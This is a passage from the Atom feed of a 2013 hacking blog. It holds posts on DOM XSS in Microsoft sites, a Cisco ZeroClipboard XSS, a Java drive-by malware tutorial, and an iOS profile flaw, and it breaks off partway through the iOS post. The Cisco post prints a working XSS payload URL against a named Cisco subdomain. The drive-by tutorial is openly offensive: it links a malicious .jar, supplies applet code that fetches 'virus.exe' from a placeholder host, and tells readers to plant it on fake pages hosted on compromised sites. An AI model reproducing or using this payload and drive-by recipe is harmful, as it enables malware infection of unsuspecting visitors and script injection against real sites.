src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=E1Da2IYn86s:TSHwsY_IhRQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=E1Da2IYn86s:TSHwsY_IhRQ:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=E1Da2IYn86s:TSHwsY_IhRQ:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/E1Da2IYn86s" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4938459677342403362/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/java-hits-another-roadblock-found-to-be.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4938459677342403362?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4938459677342403362?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/E1Da2IYn86s/java-hits-another-roadblock-found-to-be.html" title="Java Hits Another Roadblock - Found To Be A Threat For Browsers" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-CGmzA4cTOJw/UVMC3rAz7tI/AAAAAAAABC8/fZOdgi3JSMg/s72-c/3.png" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/java-hits-another-roadblock-found-to-be.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0MCR34zfip7ImA9WhBQF0U.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-8672820372953528818</id><published>2013-03-20T05:11:00.001-07:00</published><updated>2013-03-20T05:11:06.086-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-20T05:11:06.086-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DOM XSS" /><title>DOM Based XSS In Microsoft</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;img src="https://twimg0-a.akamaihd.net/profile_images/1272438885/DOMInatrixss.png" style="background-color: white; color: #333333; font-family: Verdana; font-size: 11.818181991577148px; line-height: 19.190340042114258px; padding: 10px; text-align: center;" /&gt;&lt;br /&gt;
Lately, i have been researching on DOM based XSS a bit, In my previous post i talked about the &lt;a href="http://www.rafayhackingarticles.net/2013/02/dom-based-xss-in-avg.html"&gt;DOM based XSS i found inside AVG&lt;/a&gt;, DOM based XSS is caused due to lack of input filtering inside client side javascripts, since most of the code is moving towards client side, therefore DOM based xss have been very common now a days, It is predicted by the experts that the DOM based xss mostly occurs in the websites that heavily rely upon javascripts.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
I have reported several DOM based XSS inside Microsoft, most of them were due to the lack of input filtering/sanitization inside of the several tracking scripts such as sitecatalyst and riotracking scripts as they often introduce some vulnerable sources and sinks. With that being said, let's take a look at the POC of the attack:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-2PYA71gPERw/UUmmdH0zz1I/AAAAAAAACtI/TnQobLOdsE0/s1600/MS+DOMXSS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="280" src="http://2.bp.blogspot.com/-2PYA71gPERw/UUmmdH0zz1I/AAAAAAAACtI/TnQobLOdsE0/s640/MS+DOMXSS.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The vulnerability occurs due to lack of filtering being done inside &lt;b&gt;riotracking script &lt;/b&gt;(Line 58), There are other microsoft domains that are also using the same tracking script vulnerable to DOM based XSS, see if you can find one?.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-4zTKK1lwozo/UUmmWDguzNI/AAAAAAAACtA/1_th5sxK9Hk/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="182" src="http://4.bp.blogspot.com/-4zTKK1lwozo/UUmmWDguzNI/AAAAAAAACtA/1_th5sxK9Hk/s640/Untitled.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Gy91euT5Vx0:roqyBTXO-wA:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Gy91euT5Vx0:roqyBTXO-wA:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Gy91euT5Vx0:roqyBTXO-wA:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Gy91euT5Vx0:roqyBTXO-wA:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/Gy91euT5Vx0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/8672820372953528818/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/dom-based-xss-in-microsoft.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8672820372953528818?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8672820372953528818?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/Gy91euT5Vx0/dom-based-xss-in-microsoft.html" title="DOM Based XSS In Microsoft" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-2PYA71gPERw/UUmmdH0zz1I/AAAAAAAACtI/TnQobLOdsE0/s72-c/MS+DOMXSS.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/dom-based-xss-in-microsoft.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0UDSXY5eCp7ImA9WhBQF08.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-6582487803810754179</id><published>2013-03-19T12:27:00.002-07:00</published><updated>2013-03-19T12:27:58.820-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-19T12:27:58.820-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Computer hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="Website hacking" /><title>How Attackers Spread Malware With Java Drive by?</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.foto.pk/images/cpature.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.foto.pk/images/cpature.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Hello RHA fans,&lt;br /&gt;
&lt;br /&gt;
We are back with a new tutorial. 
Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for victims? Well you will definitely be disappointed when you’ll know that this 
trick fails sometimes! Victims are now mostly aware of the old social engineering stuff. &amp;nbsp;But cheers up my 
friend there's no end, i will show you a very effective methods that attackers use to spread malicious viruses/worms.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
Well In this tutorial RHA will show you to spread virus with JAVA DRIVE 
BY!&lt;br /&gt;
&lt;h4&gt;
What is java drive by:&lt;/h4&gt;
A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click &lt;b&gt;"Run&lt;/b&gt;" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their 
permission with the help of java drive by. You can see the image of 
error below this:&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://foto.pk/images/capturlcl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="270" src="http://foto.pk/images/capturlcl.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
Okay so whats the scenario behind this? well this is a java script in 
the source which pop ups the error, So lets learn how to do the job.
&lt;br /&gt;
&lt;h4&gt;
Tools we need in this game are:
&lt;/h4&gt;
&lt;b&gt;i) &lt;/b&gt;a .jar file which is the main player of this game. Download it from here &lt;b&gt;http://www.mediafire.com/?mmafl2carb1s159
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;ii) &lt;/b&gt;A shelled web where you will upload files for JAVA DRIVE BY! Plus you should know basic HTML to make a attractive web page.
&lt;br /&gt;
&lt;b&gt;iii) &lt;/b&gt;A java script which is the backbone of your game.
&lt;br /&gt;
&lt;br /&gt;
Now lets get started, Upload you &lt;b&gt;.jar file&lt;/b&gt; on the shelled web, than 
create a fake webpage its up to you how you much you make fake webpage 
attractive, but you have to add the java code due to which the pop up 
error will appear
&lt;br /&gt;
&lt;h4&gt;
Java Code:&amp;nbsp;&lt;/h4&gt;
&lt;i&gt;&amp;lt;APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0"&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe"&amp;gt; &lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
So add the above code in your face webpage, just make some changes replace VALUE = "http://www.yoursite.com/virus.exe" with your virus like the image below:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.foto.pk/images/capturfzf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="57" src="http://www.foto.pk/images/capturfzf.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;So this is it! Simplest and most effective method used by attackers to spread your malicious software.&lt;br /&gt;
&lt;h4&gt;
&amp;nbsp;About the author &lt;/h4&gt;
&lt;div&gt;
This article has been written by fahad awan, He is the newest author on RHA team. We wish him best of luck with his tutorials.&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4CfhBTcypAg:-uwMvWcKGw8:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4CfhBTcypAg:-uwMvWcKGw8:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4CfhBTcypAg:-uwMvWcKGw8:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4CfhBTcypAg:-uwMvWcKGw8:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/4CfhBTcypAg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/6582487803810754179/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/how-attackers-spread-malware-with-java.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/6582487803810754179?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/6582487803810754179?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/4CfhBTcypAg/how-attackers-spread-malware-with-java.html" title="How Attackers Spread Malware With Java Drive by?" /><author><name>FaHaD aWaN</name><uri>http://www.blogger.com/profile/11388036707127075893</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/how-attackers-spread-malware-with-java.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkUDRn84eSp7ImA9WhBQE0s.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4363113269812768596</id><published>2013-03-15T09:17:00.002-07:00</published><updated>2013-03-15T09:17:57.131-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-15T09:17:57.131-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="swf vulnerabilities" /><title>Cisco ZeroClipboard Swf File XSS</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-RPtfA8y3Hps/UUNHKbNyjEI/AAAAAAAACsw/opLq1EZsCuo/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-RPtfA8y3Hps/UUNHKbNyjEI/AAAAAAAACsw/opLq1EZsCuo/s1600/images.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The security of &amp;nbsp;the target website depends upon the number of vectors an attacker knows, The more vectors an attacker knows the more chances he would have for compromising your website. One of the reasons why i have managed to secure my places in most of the&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2009/03/about-me.html" target="_blank"&gt; security hall of fames&lt;/a&gt;&lt;/b&gt;&amp;nbsp;was that i did not tried a single attack vectors, i tested a the target for lots of different attack vectors, one of them was swf. swf files are commonly found on mots of the websites. Though there are lots of other&amp;nbsp;vulnerabilities for swf files, however i would stick to the topic of this post and would leave other's for upcoming posts.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;Recently, i was testing cisco for potential&amp;nbsp;vulnerabilities, initially i took tested for SQLi, XSS, CSRF and other attacks, but was out of luck. Therefore, i decided to test it for swf file&amp;nbsp;vulnerabilities. One of the common swf vulnerabilities i look for inside a website is for&lt;b&gt; "ZeroClipboard Xss"&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What Is ZeroClipboard?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;The ZeroClipboard library provides an easy way to copy text to the clipboard using an invisible Adobe Flash movie, and a JavaScript interface. The "Zero" signifies that the library is invisible and the user interface is left entirely up to you.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;
&lt;br /&gt;
I used google to search, if any of cisco's subdomain or cisco.com itself contain this file, luckily i found the path to bx.cisco.com that contained &lt;b&gt;zeroclipboard.xss&lt;/b&gt;. So i began testing for XSS and bingo it worked.&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;
&lt;b&gt;Cisco Swf POC&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;i&gt;http://bx.cisco.com/cbx-portal/js/zeroclipboard/ZeroClipboard.swf#?id=\"))}catch(e){alert(/XSSbyrafay/.source);}//&amp;amp;width=500&amp;amp;height=500&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-tu1lhy_9qpY/UUNGbNJQ4NI/AAAAAAAACso/4ryuovGuJkA/s1600/CISCO+XSS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="222" src="http://4.bp.blogspot.com/-tu1lhy_9qpY/UUNGbNJQ4NI/AAAAAAAACso/4ryuovGuJkA/s400/CISCO+XSS.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;Vulnerable Code&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;
public function ZeroC&lt;i&gt;lipboard()&lt;/i&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;{
....
var flashvars:Object = LoaderInfo(this.root.loaderInfo).parameters;&lt;/i&gt;&lt;i&gt;&amp;nbsp;id = flashvars.id;
....&amp;nbsp;&lt;/i&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null);&lt;/i&gt;&lt;/blockquote&gt;
As you can look from the above code is that id parameter from Externalinterface.call is passed to the second parameter, without being properly sanitized. Therefore it results into an XSS.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Further&amp;nbsp;Reading&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
If you are really interested in learning about zeroclipboard xss, i would recommend you read the following articles:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;https://github.com/jonrohan/ZeroClipboard/issues/14&lt;/b&gt;&lt;br /&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=SSANM8AWGWQ:ZTboVpmBXeI:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=SSANM8AWGWQ:ZTboVpmBXeI:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=SSANM8AWGWQ:ZTboVpmBXeI:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=SSANM8AWGWQ:ZTboVpmBXeI:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/SSANM8AWGWQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4363113269812768596/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/cisco-zeroclipboard-swf-file-xss.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4363113269812768596?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4363113269812768596?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/SSANM8AWGWQ/cisco-zeroclipboard-swf-file-xss.html" title="Cisco ZeroClipboard Swf File XSS" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-RPtfA8y3Hps/UUNHKbNyjEI/AAAAAAAACsw/opLq1EZsCuo/s72-c/images.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/cisco-zeroclipboard-swf-file-xss.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ck8MR348eyp7ImA9WhBQEkQ.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-2674025473766105594</id><published>2013-03-14T12:09:00.000-07:00</published><updated>2013-03-14T12:54:46.073-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-14T12:54:46.073-07:00</app:edited><title>Vulnerability Discovered In iPhone - Poses Serious Threat To Users</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-mdeXi9Z3G_Y/UUIfkDP5MLI/AAAAAAAABCU/c85ZAR761tI/s1600/vulnerability.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-mdeXi9Z3G_Y/UUIfkDP5MLI/AAAAAAAABCU/c85ZAR761tI/s400/vulnerability.jpg" width="375" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
Another vulnerability has been discovered on iPhone that could allow hackers to remotely control it. &lt;b&gt;&lt;a href="http://blog.skycure.com/2013/03/malicious-profiles-sleeping-giant-of.html" rel="nofollow" target="_blank"&gt;Skycure, an Israeli company, states it to be a major flaw in iOS configuration which could post a malware threat.&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
A file known as mobileconf is being attacked due to this vulnerability. This file is used by phones carriers to configure system-level settings including WiFi, VPN, email and APN.&lt;br /&gt;
&lt;br /&gt;
Skycure's CEO, Adi Sharabani, has taken the exploit to a test drive to explain how an iPhone can be controlled while retrieving victim's location and other sensitive information.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-dULx7L5vybk/UUIdoXtITGI/AAAAAAAABCM/Y25KuU6gAfk/s1600/Critical+iOS+vulnerability+in+Configuration+Profiles+pose+malware+threat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="249" src="http://1.bp.blogspot.com/-dULx7L5vybk/UUIdoXtITGI/AAAAAAAABCM/Y25KuU6gAfk/s640/Critical+iOS+vulnerability+in+Configuration+Profiles+pose+malware+threat.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h4 style="text-align: left;"&gt;
Ways to get infected:&lt;/h4&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;ol style="background-color: white; color: #333333; line-height: 19px; list-style-image: initial; list-style-position: initial; margin: 0.5em 0px; outline: none; padding: 0px 0px 0px 2em; text-align: justify;"&gt;
&lt;li style="margin: 0px; outline: none; padding: 0px;"&gt;&lt;span style="white-space: pre-wrap;"&gt;&lt;span style="font-family: inherit;"&gt;Victims browse to an attacker-controlled website, which promises them free access to popular movies and TV-shows. In order to get the free access, “all they have to do” is to install an iOS profile that will “configure” their devices accordingly.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
